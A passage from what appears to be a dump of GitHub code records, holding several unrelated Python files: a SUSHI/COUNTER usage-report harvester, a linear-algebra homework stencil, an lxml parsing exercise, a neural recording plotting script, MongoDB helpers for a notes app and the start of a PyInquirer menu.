NS, customer_reference)\t\t#Create a child node of 'CustomerReference', tagged 'ID' and holding the cutomer ref ID\r\n\r\n\tcust_name_elem = add_sub(cust_ref_elem, \"{%(sushi)s}Name\" % NS, customer_name)\r\n\r\n\treport_def_elem = etree.SubElement(\t rr, \"{%(sushi)s}ReportDefinition\" % NS, Name=report, Release=str(release) )\r\n\tfilters = etree.SubElement(report_def_elem, \"{%(sushi)s}Filters\" % NS)\r\n\tudr = etree.SubElement(filters, \"{%(sushi)s}UsageDateRange\" % NS)\r\n\tbeg = etree.SubElement(udr, \"{%(sushi)s}Begin\" % NS)\r\n\r\n\tbeg.text = start_date.strftime(\"%Y-%m-%d\")\r\n\tend = etree.SubElement(udr, \"{%(sushi)s}End\" % NS)\r\n\tend.text = end_date.strftime(\"%Y-%m-%d\")\r\n\t#print(etree.tostring(rooty, pretty_print = True, encoding = 'unicode'))\r\n\tpayload = etree.tostring( rooty, pretty_print=True, xml_declaration=True, encoding=\"utf-8\" )\r\n\t#=============================================================\r\n\theaders = {\r\n\t\t\"SOAPAction\": '\"SushiService:GetReportIn\"',\r\n\t\t\"Content-Type\": \"text/xml; charset=UTF-8\",\r\n\t\t\"Content-Length\": str(len(payload)),\r\n\t}\r\n\t\r\n\tresponse = rq.post(url=wsdl_url, headers=headers, data=payload, verify=verify) # Post the SUSHI tree to the server and save teh response as 'response'\r\n\tif sushi_dump:\r\n\t\tlogger.debug(\r\n\t\t\t\"SUSHI DUMP: request: %s \\n\\n response: %s\", payload, response.content\r\n\t\t)\r\n\t#rt = etree.fromstring(response.content) # tombstoned for testing\r\n\treturn response.content\r\n#############################################################################################################################\r\n#############################################################################################################################\r\n#\r\n#############################################################################################################################\r\ndef jr1_df(lgn, month, year):\r\n\t'''\r\n\tPull down a single month's JR1 report, and return it as a DataFrame\r\n\t-----------------------------------------------------------------------------\r\n\tlgn -> a 3-member tuple of strings that holds the SUSHI server's location and login credentials\r\n\t\tlgn[0] -> (str) The SUSHI server URL\r\n\t\tlgn[1] -> (str) The SUSHI requestor ID\r\n\t\tlgn[2] -> (str) the SUSHI customer ID\r\n\tmonth -> (int) the month of the requested report\r\n\tyear -> (int) the year of the requested report\r\n\t'''\r\n\ttry:\r\n\t\trepo = etree.fromstring(raw_xml_rep( lg = lgn, mnth = month, yr = year, report = 'JR1'))\r\n\r\n\t\tcolset = ['ItemName', 'Print_ISSN', 'Proprietary', 'Online_ISSN', 'ItemPlatform', 'ItemPublisher', 'ItemDataType', 'ft_total', 'ft_html', 'ft_pdf']\r\n\t\t#============================================================\r\n\t\trootp = repo[0][0][3][0][1]\r\n\t\tbdf = pd.DataFrame(columns = colset)\r\n\r\n\t\tfor i in range(2,len(rootp.getchildren())): #loop through the subtrees that have content to go into the dataframe\r\n\t\t\ttemp = [''] * len(colset)\t\t\t\t#Create the holder list that will hold this row and go into the DF\r\n\t\t\tfor child in rootp[i].getchildren():\t\t#loop through the first level of each subtree\r\n\t\t\t\r\n\t\t\t\t# Grab the elements that are in the first level of the rootp tree after the root\r\n\t\t\t\tfor colname in colset:\t#loop through all of the columns and grab the first-level texts whose tag matches a column name\r\n\t\t\t\t\tif \"{http://www.niso.org/schemas/counter}\"+colname == child.tag:\r\n\t\t\t\t\t\ttemp[colset.index(colname)] = child.text\r\n\r\n\t\t\t\t# Grab the elements that are under an 'ItemIdentifier' subtree by thier type\r\n\t\t\t\tif child.tag == '{http://www.niso.org/schemas/counter}ItemIdentifier':\t#look at each subtree whose root is an ItemIdentifier\r\n\t\t\t\t\tItemID_children_list = list(child.getchildren())\t#This should be two elements: the type and the value\r\n\t\t\t\t\ttype = str(child.findall('{http://www.niso.org/schemas/counter}Type')[0].text)\t#grab the type, which should match a column name\r\n\t\t\t\t\tval = str(child.findall('{http://www.niso.org/schemas/counter}Value')[0].text)\t\t#grab the value, in a sting format.\r\n\t\t\t\t\tif type in colset:\t#make sure the type is an element in colset\r\n\t\t\t\t\t\ttemp[colset.index(type)] = val\t#add the new val to temp in the correct column\r\n\t\t\t\t\r\n\t\t\t\t# Grab the elements that are under an 'ItemPerformance' tag.\r\n\t\t\t\tif child.tag == '{http://www.niso.org/schemas/counter}ItemPerformance':\r\n\t\t\t\t\tinstance = child.find('{http://www.niso.org/schemas/counter}Instance')\r\n\t\t\t\t\tmetric_type = instance.find('{http://www.niso.org/schemas/counter}MetricType').text\r\n\t\t\t\t\tct = instance.find('{http://www.niso.org/schemas/counter}Count').text\r\n\t\t\t\t\ttemp[colset.index(metric_type)] = ct\r\n\t\t\tbdf.loc[len(bdf)] = temp\r\n\t\treturn bdf\r\n\t# Catch potential errors and return an error flag and an empty dataframe. This matches what's sometimes\r\n\t # returned from error-ed out SUSHI requests, so we'll just check for this format of dataframe to determine when an error has occurred\r\n\texcept:\r\n\t\tprint(\"Error in handling\",lgn)\r\n\t\terr_df = pd.DataFrame(columns = colset)\r\n\t\treturn err_df\r\n#############################################################################################################################\r\n#############################################################################################################################\r\n#\r\n#############################################################################################################################\r\ndef mr1_df(lgn,month,year):\r\n\t'''\r\n\tPull down a single month's MR1 report, and return it as a DataFrame\r\n\t-----------------------------------------------------------------------------\r\n\tlgn -> a 3-member tuple of strings that holds the SUSHI server's location and login credentials\r\n\t\tlgn[0] -> (str) The SUSHI server URL\r\n\t\tlgn[1] -> (str) The SUSHI requestor ID\r\n\t\tlgn[2] -> (str) the SUSHI customer ID\r\n\tmonth -> (int) the month of the requested report\r\n\tyear -> (int) the year of the requested report\r\n\t'''\r\n\t# Initialize the report in var 'repo'\r\n\trepo = etree.fromstring(raw_xml_rep( lg = lgn, mnth = month, yr = year, report = 'MR1'))\r\n\tmonth_date = pd.Period(freq = 'M', year = year , month = month)\r\n\r\n\r\n\t# Initialize the colset, df, and report data parent node\r\n\tcolset = ['ItemName', 'ItemPlatform', 'ItemPublisher', 'Category', 'MetricType', 'Date', 'Count']\r\n\tdf = pd.DataFrame(columns = colset)\r\n\ttry:\r\n\t\trootp = repo[0][0][3][0][1] #\tset up the root node for the actual report content\r\n\t\t\r\n\t\tfor report_item in rootp.getchildren(): #\trepo[0][0][3][0][1] is the parent node to all of the ReportItem nodes\r\n\t\t\ttemp = [''] * len(colset)\t\t\t\t#\tCreate the holder list that will hold this row and go into the DF \r\n\t\t\tif report_item.tag == '{http://www.niso.org/schemas/counter}ReportItems':\r\n\t\t\t\tfor data_node in report_item.getchildren():\r\n\t\t\t\t\t\r\n\t\t\t\t\t# Loop through all of the columns and grab the first-level texts whose tag matches a column name\r\n\t\t\t\t\tfor colname in colset:\r\n\t\t\t\t\t\tif \"{http://www.niso.org/schemas/counter}\"+colname == data_node.tag:\r\n\t\t\t\t\t\t\ttemp[colset.index(colname)] = data_node.text\r\n\t\t\t\t\t\r\n\t\t\t\t\t# Dig into the data_node's ItemPerformance subnode and grab the category, metric type, and count data points\r\n\t\t\t\t\tif data_node.tag == '{http://www.niso.org/schemas/counter}ItemPerformance':\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\t# Grab the top-level category data point\r\n\t\t\t\t\t\tcateg = instance = data_node.find('{http://www.niso.org/schemas/counter}Category')\r\n\t\t\t\t\t\ttemp[colset.index('Category')] = categ.text\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\t# Drill into the Instance node and find the 'MetricType' and 'Count' nodes, then add them to 'temp'\r\n\t\t\t\t\t\tinstance = data_node.find('{http://www.niso.org/schemas/counter}Instance')\r\n\t\t\t\t\t\tmetric_type = instance.find('{http://www.niso.org/schemas/counter}MetricType').text\r\n\t\t\t\t\t\tct = instance.find('{http://www.niso.org/schemas/counter}Count').text\r\n\t\t\t\t\t\ttemp[colset.index('MetricType')] = metric_type\r\n\t\t\t\t\t\ttemp[colset.index('Date')] = month_date.strftime('%b-%Y')\r\n\t\t\t\t\t\ttemp[colset.index('Count')] = ct\r\n\t\t\t\t\t\t\r\n\t\t\t# Add the completed row to the dataframe\r\n\t\t\tif temp != [''] * len(colset):\r\n\t\t\t\tdf.loc[len(df)] = temp\r\n\t\treturn df\r\n\texcept:\r\n\t\treturn df\r\n\r\n#############################################################################################################################\r\n#############################################################################################################################\r\n#\r\n#############################################################################################################################\r\ndef br1_df(lgn,month,year):\r\n\t# download report, define dataframe to populate and return, and format date for date column\r\n\trepo = etree.fromstring(raw_xml_rep( lg = lgn, mnth = month, yr = year, report = 'BR1'))\r\n\tcolset = ['ItemName', 'ItemPlatform', 'ItemPublisher', 'Print_ISBN', 'Online_ISBN', 'Proprietary', 'ItemDataType', 'Category', 'MetricType', 'Date', 'Count']\r\n\tdf = pd.DataFrame(columns = colset)\r\n\tdate = str(month) + '/' + str(year)\r\n\t\r\n\ttry:\r\n\t\trootp = repo[0][0][3][0][1]\r\n\t\tfor report_row_node in rootp:\r\n\t\t\ttemp = [''] * len(colset)\r\n\t\t\tif report_row_node.tag == '{http://www.niso.org/schemas/counter}ReportItems':\r\n\t\t\t\t# Create a line-holder vector, then go into the actual data nodes for this row\r\n\t\t\t\ttemp[colset.index('Date')] = date\r\n\t\t\t\tfor data_node in report_row_node:\r\n\t\t\t\t\r\n\t\t\t\t\t # STEP I: Loop through all of the columns and grab the first-level texts whose tag matches a column name\r\n\t\t\t\t\t #NOTE: Might be better to replace with a parser to remove URL from XML tag and use \"if-in\" to check colset for remaining tag-text. \r\n\t\t\t\t\tfor colname in colset:\r\n\t\t\t\t\t\tif \"{http://www.niso.org/schemas/counter}\"+colname == data_node.tag:\r\n\t\t\t\t\t\t\ttemp[colset.index(colname)] = data_node.text\r\n\t\t\t\t\t\t\t\r\n\t\t\t\t\t# STEP II: in each of the 3 ItemIdentifier nodes, grab the Type and Values subnodes' texts and \r\n\t\t\t\t\t #use the Type to identify the correct column for the Value text.\r\n\t\t\t\t\tif data_node.tag == '{http://www.niso.org/schemas/counter}ItemIdentifier':\r\n\t\t\t\t\t\ttype = data_node.find('{http://www.niso.org/schemas/counter}Type').text\r\n\t\t\t\t\t\tvalue = data_node.find('{http://www.niso.org/schemas/counter}Value').text\r\n\t\t\t\t\t\ttemp[colset.index(type)] = value\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t#STEP III: grab the Category subnode's text and populate that column, then\r\n\t\t\t\t\t #search the Instance subnode and take the values of its MetricType and Count subnodes.\r\n\t\t\t\t\t #Use these values to populate the appropriate spaces in the array.\r\n\t\t\t\t\tif data_node.tag == '{http://www.niso.org/schemas/counter}ItemPerformance':\r\n\t\t\t\t\t\ttemp[colset.index('Category')] = data_node.find('{http://www.niso.org/schemas/counter}Category').text\r\n\t\t\t\t\t\tinstance = data_node.find('{http://www.niso.org/schemas/counter}Instance')\r\n\t\t\t\t\t\ttemp[colset.index('MetricType')] = instance.find('{http://www.niso.org/schemas/counter}MetricType').text\r\n\t\t\t\t\t\ttemp[colset.index('Count')] = instance.find('{http://www.niso.org/schemas/counter}Count').text\r\n\r\n\t\t\t# Add the completed row to the dataframe\r\n\t\t\tif temp != [''] * len(colset):\r\n\t\t\t\tdf.loc[len(df)] = temp\r\n\t\treturn df\r\n\texcept:\r\n\t\treturn df\r\n\r\n#############################################################################################################################\r\n#############################################################################################################################\r\n#\r\n#############################################################################################################################\r\ndef mr1_over_time(start_year, end_year, start_month, end_month, credentials, out_file = ''):\r\n\t'''\r\n\tThis is the in-progress version of the MR1 over-time report harvester.\r\n\t'''\r\n\tcol_set = ['ItemName', 'ItemPlatform', 'ItemPublisher', 'Category', 'MetricType']\r\n\ttemp = pd.DataFrame(columns = col_set)\r\n\tfor y in range (start_year, end_year +1):\t\t# Loop through the full year range\r\n\t\tfor m in range(start_month, end_month +1):\t# loop through the full month range\r\n\t\t\tif temp.empty:\t#if this is the first \r\n\t\t\t\ttemp = mr1_df(credentials,m,y)\r\n\t\t\t\tif temp.empty:\r\n\t\t\t\t\tprint('This B empty.', m, y)\r\n\t\t\t\telse:\r\n\t\t\t\t\tprint(m,y, \"confirmed\")\r\n\t\t\telse:\r\n\t\t\t\ttry:\r\n\t\t\t\t\tstart = time.time()\r\n\t\t\t\t\tto_add = mr1_df(credentials,m,y)\r\n\t\t\t\t\ttemp = pd.concat([temp,mr1_df(credentials,m,y)], ignore_index = True)\r\n\t\t\t\t\tend = time.time()\r\n\t\t\t\t\tprint(end-start, m, y)\r\n\t\t\t\texcept:\r\n\t\t\t\t\tprint(m, y, 'not available')\r\n\ttemp.fillna(0, inplace = True)\r\n\tif out_file != '':\r\n\t\ttemp.to_csv(out_file)\r\n\treturn temp","repo_name":"ChrisHergert/PyCounter-Conversion","sub_path":"pybr.py","file_name":"pybr.py","file_ext":"py","file_size_in_byte":16527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39389477645","text":"# version code 031e89400b69\n# Please fill out this stencil and submit using the provided submission script.\n\nfrom GF2 import one\nfrom math import sqrt, pi\nfrom matutil import coldict2mat\nfrom matutil import mat2coldict\nfrom matutil import mat2rowdict\nfrom solver import solve\nfrom vecutil import list2vec\nfrom vec import Vec\nfrom submit import test_format\n\n\n\n## 1: (Problem 5.14.1) Span of Vectors over R, A\n# For each part, please provide your solution as a list of the coefficients for\n# the generators of V.\n#\n# For example, [1, 3, 5] would mean 1*[2,0,4,0] + 3*[0,1,0,1] + 5*[0,0,-1,-1]\n\nrep_1 = [...]\nrep_2 = [...]\nrep_3 = [...]\n\n\n\n## 2: (Problem 5.14.2) Span of Vectors over R, B\n# For each part, please provide your solution as a list of the coefficients for\n# the generators of V.\n\nlin_comb_coefficients_1 = [...]\nlin_comb_coefficients_2 = [...]\nlin_comb_coefficients_3 = [...]\nlin_comb_coefficients_4 = [...]\n\n\n\n## 3: (Problem 5.14.3) Span of Vectors over GF2 A\n# Use one from the GF2 module, not the integer 1.\n# For each part, please provide your solution as a list of the coefficients for\n# the generators of V.\n\ngf2_rep_1 = [...]\ngf2_rep_2 = [...]\ngf2_rep_3 = [...]\n\n\n\n## 4: (Problem 5.14.4) Span of Vectors over GF2 B\n# Use one from the GF2 module, not the integer 1.\n# For each part, please provide your solution as a list of the coefficients for\n# the generators of V.\n\ngf2_lc_rep_1 = [...]\ngf2_lc_rep_2 = [...]\ngf2_lc_rep_3 = [...]\ngf2_lc_rep_4 = [...]\n\n\n\n## 5: (Problem 5.14.5) Linear Dependence over R A\n# For each part, please provide your solution as a list of the coefficients for\n# the generators of V.\n\nlin_dep_R_1 = [2,-1,-1]\nlin_dep_R_2 = [28,-7,4]\nlin_dep_R_3 = [-4138/1035, -35/207, 16/621, 1, 0]\n\n\n\n## 6: (Problem 5.14.6) Linear Dependence over R B\n# Please record your solution as a list of coefficients\n\nlinear_dep_R_1 = [1/3,-1/3,1]\nlinear_dep_R_2 = [2*pi*(sqrt(2)), sqrt(2), pi]\nlinear_dep_R_3 = [0,0,0,0]\n\n\n\n## 7: (Problem 5.14.7) Superfluous vector\n# Assign the COEFFICIENT of the vector to each variable.\n# Assign sum_to to the vector that you are expressing as a linear combination\n# of the other two. Write the name of the vector as a STRING. i.e. 'u' or 'w'\n\nu = -1\nv = 1\nw = 0\nsum_to = 'w'\n\n\n\n## 8: (Problem 5.14.8) 4 linearly dependent vectors, every 3 are independent\n# Please use the Vec class to represent your vectors\n\nindep_vec_1 = list2vec([1,-1,0,0])\nindep_vec_2 = list2vec([0,1,-1,0])\nindep_vec_3 = list2vec([0,0,1,-1])\nindep_vec_4 = list2vec([-1,0,0,1])\n\n\n\n## 9: (Problem 5.14.9) Linear Dependence over GF(2) A\n# Please give your solution as a list of coefficients of the linear combination\n\nzero_comb_1 = [one, one, 0, one]\nzero_comb_2 = [0,one,one,one]\nzero_comb_3 = [one,one,0,0,one]\n\n\n\n## 10: (Problem 5.14.10) Linear Dependence over GF(2) B\n# Please give your solution as a list of coefficients of the vectors\n# in the set in order (list the coefficient for v_i before v_j if i < j).\n\nsum_to_zero_1 = [...]\nsum_to_zero_2 = [...]\nsum_to_zero_3 = [...]\nsum_to_zero_4 = [...]\n\n\n\n## 11: (Problem 5.14.11) Exchange Lemma for Vectors over $\\R$\n## Please express your answer as a list of ints, such as [1,0,0,0,0]\n\nexchange_1 = [0,0,0,0,1]\nexchange_2 = [0,0,0,1,0]\nexchange_3 = [0,0,1,0,0]\n\n\n\n## 12: (Problem 5.14.12) Exchange Lemma for Vectors over GF(2)\n# Please give the name of the vector you want to replace as a string (e.g. 'v1')\n\nreplace_1 = 'v3'\nreplace_2 = 'v1'\nreplace_3 = 'v1'\n\n\n\n## 13: (Problem 5.14.13) rep2vec\ndef rep2vec(u, veclist):\n '''\n Input:\n - u: a vector as an instance of your Vec class with domain set(range(len(veclist)))\n - veclist: a list of n vectors (as Vec instances)\n Output:\n vector v (as Vec instance) whose coordinate representation is u\n Example:\n >>> a0 = Vec({'a','b','c','d'}, {'a':1})\n >>> a1 = Vec({'a','b','c','d'}, {'b':1})\n >>> a2 = Vec({'a','b','c','d'}, {'c':1})\n >>> rep2vec(Vec({0,1,2}, {0:2, 1:4, 2:6}), [a0,a1,a2]) == Vec({'a', 'c', 'b', 'd'},{'a': 2, 'c': 6, 'b': 4, 'd': 0})\n True\n '''\n return coldict2mat(veclist) * u\n\n\n## 14: (Problem 5.14.14) vec2rep\ndef vec2rep(veclist, v):\n '''\n Input:\n - veclist: a list of vectors (as instances of your Vec class)\n - v: a vector (as Vec instance) with domain set(range(len(veclist)))\n with v in the span of set(veclist).\n Output:\n Vec instance u whose coordinate representation w.r.t. veclist is v\n Example:\n >>> a0 = Vec({'a','b','c','d'}, {'a':1})\n >>> a1 = Vec({'a','b','c','d'}, {'b':1})\n >>> a2 = Vec({'a','b','c','d'}, {'c':1})\n >>> vec2rep([a0,a1,a2], Vec({'a','b','c','d'}, {'a':3, 'c':-2})) == Vec({0, 1, 2},{0: 3.0, 1: 0.0, 2: -2.0})\n True\n '''\n return solve(coldict2mat(veclist),v)\n\n\n## 15: (Problem 5.14.15) Superfluous Vector in Python\ndef is_superfluous(L, i):\n '''\n Input:\n - L: list of vectors as instances of Vec class\n - i: integer in range(len(L))\n Output:\n True if the span of the vectors of L is the same\n as the span of the vectors of L, excluding L[i].\n\n False otherwise.\n Examples:\n >>> a0 = Vec({'a','b','c','d'}, {'a':1})\n >>> a1 = Vec({'a','b','c','d'}, {'b':1})\n >>> a2 = Vec({'a','b','c','d'}, {'c':1})\n >>> a3 = Vec({'a','b','c','d'}, {'a':1,'c':3})\n >>> is_superfluous(L, 3)\n True\n >>> is_superfluous([a0,a1,a2,a3], 3)\n True\n >>> is_superfluous([a0,a1,a2,a3], 0)\n True\n >>> is_superfluous([a0,a1,a2,a3], 1)\n False\n '''\n if len(L) < 1:\n return False\n\n if len(L) == 1:\n return L[0].is_almost_zero()\n\n t = L.copy()\n p = t.pop(i)\n n = coldict2mat(t)\n u = p - n*solve(n,p)\n if u.is_almost_zero():\n return True\n\n\n return False\n\n\na0 = Vec({'a','b','c','d'}, {'a':1})\na1 = Vec({'a','b','c','d'}, {'b':1})\na2 = Vec({'a','b','c','d'}, {'c':1})\na3 = Vec({'a','b','c','d'}, {'a':1,'c':3})\n\n# print(is_superfluous([a0,a1,a2,a3], 3), True)\n# print(is_superfluous([a0,a1,a2,a3], 3), True)\n# print(is_superfluous([a0,a1,a2,a3], 0),True)\n# print(is_superfluous([a0,a1,a2,a3], 1), False)\n\nD = {'a','b','c','d'}\nd0=Vec(D, {'a':1,'b':-1})\nd1=Vec(D, {'c':-1,'b':1})\nd2=Vec(D, {'c':1,'d':-1})\nd3=Vec(D, {'a':-1,'d':1})\nd4=Vec(D, {'b':1, 'c':1, 'd':-1})\n\n\n# print((is_superfluous([d0,d1,d2,d3],3)),True)\n# print(((is_superfluous([d0,d1,d2,d3],2))),True)\n# print(((is_superfluous([d0,d1,d2,d3],1))),True)\n# print(((is_superfluous([d0,d1,d2,d3],0))),True)\n# print(((is_superfluous([d0,d1,d2,d3,d4],4))),True)\n# print(((is_superfluous([d0,d1,d2,d3,d4],3))),True)\n# print(((is_superfluous([d0,d1,d2,d3,d4],2))),True)\n# print(((is_superfluous([d0,d1,d2,d3,d4],1))),True)\n# print(((is_superfluous([d0,d1,d2,d3,d4],0))),True)\n\nv1 = Vec({0, 1, 2},{0: 0.1111111111111111, 1: 0.2857142857142857, 2: 0.6})\nv2 = Vec({0, 1, 2},{0: 0.18181818181818182, 1: 0.17647058823529413, 2: 0.45454545454545453})\nv3 = Vec({0, 1, 2},{0: 0.24963924963924963, 1: 0.5171886936592819, 2: 1.122077922077922})\n# print(((is_superfluous([v1,v2,v3], 2))))\n# print(((is_superfluous([v1],0))))\n# print(((is_superfluous([Vec({0,1,2},dict())],0))))\n\n\n## 16: (Problem 5.14.16) is_independent in Python\ndef is_independent(L):\n i = 0\n while True:\n if i >= len(L):\n return True\n\n elif is_superfluous(L,i):\n return False\n\n else:\n i+=1\n\nvlist = [Vec({0, 1, 2},{0: 1}), Vec({0, 1, 2},{1: 1}), Vec({0, 1, 2},{2: 1}), Vec({0, 1, 2},{0: 1, 1: 1, 2: 1}), Vec({0, 1, 2},{1: 1, 2: 1}), Vec({0, 1, 2},{0: 1, 1: 1})]\n#print(is_independent(vlist), False)\n#print(is_independent(vlist[:3]),True)\n#print(is_independent(vlist[:2]), True)\n#print(is_independent(vlist[1:4]),True)\n#print(is_independent(vlist[2:5]),True)\n#print(is_independent(vlist[2:6]),False)\n#print(is_independent(vlist[1:3]),True)\n# print(is_independent(vlist[5:]),True)\n\n## 17: (Problem 5.14.17) Subset Basis\ndef subset_basis(T):\n i = 0\n A = T.copy()\n for x in T:\n if i >= len(A):\n break\n if is_superfluous(A,i):\n A.pop(i)\n\n else:\n i = i + 1\n\n return A\n\na0 = Vec({'a','b','c','d'}, {'a':1})\na1 = Vec({'a','b','c','d'}, {'b':1})\na2 = Vec({'a','b','c','d'}, {'c':1})\na3 = Vec({'a','b','c','d'}, {'a':1,'c':3})\nsb = subset_basis([a0, a1, a2, a3])\nprint(all(v in [a0, a1, a2, a3] for v in sb))\n\n\n## 18: (Problem 5.14.18) Superset Basis Lemma in Python\ndef superset_basis(T, L):\n '''\n Input:\n - T: linearly independent list of Vec instances\n - L: list of Vec instances such that every vector in T is in Span(L)\n Output:\n Linearly independent list S containing all vectors (as instances of Vec)\n such that the span of S is the span of L (i.e. S is a basis for the span\n of L).1\n Example:\n >>> a0 = Vec({'a','b','c','d'}, {'a':1})\n >>> a1 = Vec({'a','b','c','d'}, {'b':1})\n >>> a2 = Vec({'a','b','c','d'}, {'c':1})\n >>> a3 = Vec({'a','b','c','d'}, {'a':1,'c':3})\n >>> superset_basis([a0, a3], [a0, a1, a2]) == [Vec({'a', 'c', 'b', 'd'},{'a': 1}), Vec({'a', 'c', 'b', 'd'},{'b':1}),Vec({'a', 'c', 'b', 'd'},{'c': 1})]\n True\n '''\n k = T.copy()\n for i in L:\n k = k + [i]\n if not is_independent(k):\n k.remove(i)\n\n\n return k\n\n\na0 = Vec({'a','b','c','d'}, {'a':1})\na1 = Vec({'a','b','c','d'}, {'b':1})\na2 = Vec({'a','b','c','d'}, {'c':1})\na3 = Vec({'a','b','c','d'}, {'a':1,'c':3})\n\n#print(superset_basis([a0, a3], [a0, a1, a2]))\n\n## 19: (Problem 5.14.19) Exchange Lemma in Python\ndef exchange(S, A, z):\n '''\n Input:\n - S: a list of vectors, as instances of your Vec class\n - A: a list of vectors, each of which are in S, with len(A) < len(S)\n - z: an instance of Vec such that A+[z] is linearly independent\n Output: a vector w in S but not in A such that Span S = Span ({z} U S - {w})\n Example:\n >>> S = [list2vec(v) for v in [[0,0,5,3],[2,0,1,3],[0,0,1,0],[1,2,3,4]]]\n >>> A = [list2vec(v) for v in [[0,0,5,3],[2,0,1,3]]]\n >>> z = list2vec([0,2,1,1])\n >>> exchange(S, A, z) == Vec({0, 1, 2, 3},{0: 0, 1: 0, 2: 1, 3: 0})\n True\n '''\n pass\n\n","repo_name":"omrigildor/cs53","sub_path":"src/hw/The_Basis.py","file_name":"The_Basis.py","file_ext":"py","file_size_in_byte":10253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37916059727","text":"from lxml import etree\n\nwith open ('show_sec_zones.xml', 'r') as f:\n file = f.read()\n\nmy_xml = etree.fromstring(file)\n#print(my_xml.tag)\n#a = my_xml.find('zones-security')\n#print('Find tag of the first zones-security element')\n#print('-'*30)\n#print(a.tag)\n#print()\n#\n#ch = a.getchildren()\n#print('Find tag of all child elements of the first zones-security element')\n#print('-'*30)\n#for child in ch:\n# print(child.tag)\n\n#q4b\n#a= my_xml.getchildren()[0]\n#print(a)\n#new = a.find('zones-security-zonename')\n#print(new)\n#print(new.text)\n\n#q4c\na = my_xml.findall('zones-security')\nfor element in a:\n # print(element)\n new = element.find('zones-security-zonename')\n print(new, new.text)\n # print(element.text)\n\n#print(a)\n\n\n#txt = print(a.text)\n\n","repo_name":"abhinav2938/Kirk_python-course","sub_path":"exer7/q4a.py","file_name":"q4a.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"17869636353","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 15 17:15:14 2019\n\n@author: localadmin1\n\"\"\"\nfrom tkinter.filedialog import askopenfilename, askdirectory\nfrom os import listdir\nfrom tkinter import Tk\nimport neo\nfrom math import floor\nimport scipy.signal as sig\nfrom quantities import Hz, s\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom plexon_an import *\nfrom sklearn.preprocessing import normalize\nTk().withdraw()\n \nfname=askopenfilename()\nreader= neo.io.PlexonIO(filename=fname)\nrec = reader.read_segment()\n\nselcan=input(\"What channel? (type number or ALL and press enter) \")\nlinw=float(input(\"How thick do you want the line? 0.1 is very thin 2 is very thick \"))\nstarplot=int(1000*float(input(\"First point to plot? type 0 if you want the all trace \")))\nendplot=int(1000*float(input(\"Last point to plot? type 299 if you want the all trace \")))\nshowspikes=0\n\nif selcan.upper()!=\"ALL\":\n channel=rec.analogsignals[int(selcan)-1][starplot:endplot]\n channel=remove_large_spikes(channel, 7) #change number to change visualised\n if showspikes==1: plot_spikes(channel,find_peaks(channel))\n else: plt.plot(channel.times,channel, 'k', linewidth=linw)\nelse:\n maxlist=[]\n minlist=[]\n arrchan=[]\n t=[]\n for i in rec.analogsignals:\n i=remove_large_spikes(i, 7) #change number to change visualised\n i=i[starplot:endplot] #change the range to plot \n arrchan.append(i.as_array())\n t.append(i.times)\n maxlist.append(max(i.as_array()))\n minlist.append(min(i.as_array()))\n\n fig, axs = plt.subplots(16, 1)\n for s,c in enumerate(arrchan):\n axs[s].plot(t[s],c, 'k', linewidth=linw)\n axs[s].set_ylim(min(minlist), max(maxlist))\n axs[s].set_xlabel('time')\n axs[s].set_ylabel('uV')\n \n\n plt.show()\n plt.savefig(fname[:-3]+'svg')\n\ntwodplots=0\nif twodplots==1:\n #No artifact removal!\n RECM=np.empty([len(rec.analogsignals),len(rec.analogsignals[0])])\n for c,v in enumerate(rec.analogsignals):\n RECM[c]=v.as_array()[:,0]\n \n print(\"Fig1:voltages,Fig2:Attempt at CSD, \\n Figs 3--6 correlation coefficient at differnt times\")\n plt.matshow(downsample_matrix_to(RECM,300))\n plt.colorbar()\n CSD=np.diff(np.diff(RECM,axis=0),axis=0)\n plt.matshow(downsample_matrix_to(CSD,300))\n plt.colorbar()\n for k in [1000,100000,200000,29000]:\n plt.matshow(np.corrcoef(RECM[:,k:k+1000]))\n plt.colorbar()\n\n\n \n","repo_name":"sapkotahari/recycling-centre","sub_path":"visualise.py","file_name":"visualise.py","file_ext":"py","file_size_in_byte":2442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25207883787","text":"from database import db\nfrom bson.objectid import ObjectId\n\ndef save_cookie(id_cookie):\n if not isinstance(id_cookie, str):\n return None\n\n data = {\n \"id_cookie\": id_cookie\n }\n user_id = db.cookies.insert_one(data).inserted_id\n\n return user_id\n\ndef create_user(user_id):\n if not isinstance(user_id, str):\n return None\n \n data = {\n \"_id\": ObjectId(user_id)\n }\n\n user_id = db.users.insert_one(data).inserted_id\n return user_id\n\ndef check_user(id_cookie):\n if not isinstance(id_cookie, str):\n return None\n\n result = db.cookies.find_one({\"id_cookie\" : id_cookie})\n \n if not result:\n return None\n return result[\"_id\"]\n\ndef save_note(user_id, title, note):\n if not isinstance(user_id, str):\n return False\n if not isinstance(note, str):\n return False\n if not isinstance(title, str):\n return False\n\n data = {\n \"_id\": ObjectId(user_id),\n \"title\" : title,\n \"note\": note\n }\n note_id = db.notes.insert_one(data).inserted_id\n \n return bool(note_id)\n\ndef get_notes(user_id):\n if not isinstance(user_id, str):\n return None\n\n notes = db.notes.find({\"_id\" : ObjectId(user_id)})\n\n if notes.count() == 0:\n return None\n return notes\n","repo_name":"salujayatharth/notes","sub_path":"notes/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"39268317418","text":"import os\nimport signal\nimport sys\nfrom subprocess import Popen\n\nfrom PyInquirer import prompt\nfrom examples import custom_style_2\n\nquestions = [\n {\n 'type': 'list',\n 'name': 'user_option',\n 'message': 'Welcome! Which plot would you like to reproduce?',\n 'choices': [\"Figure 1\", \"Figure 2\", \"Figure 6\"]\n }\n]\n\nquestions_figure_6 = [\n {\n 'type': 'input',\n 'name': 'data_path',\n 'message': 'Path to the QMNIST dataset:',\n 'validate': lambda val: os.path.isdir(val)\n },\n {\n 'type': 'input',\n 'name': 'epochs',\n 'message': 'Number Epochs: ',\n 'default': '100',\n 'validate': 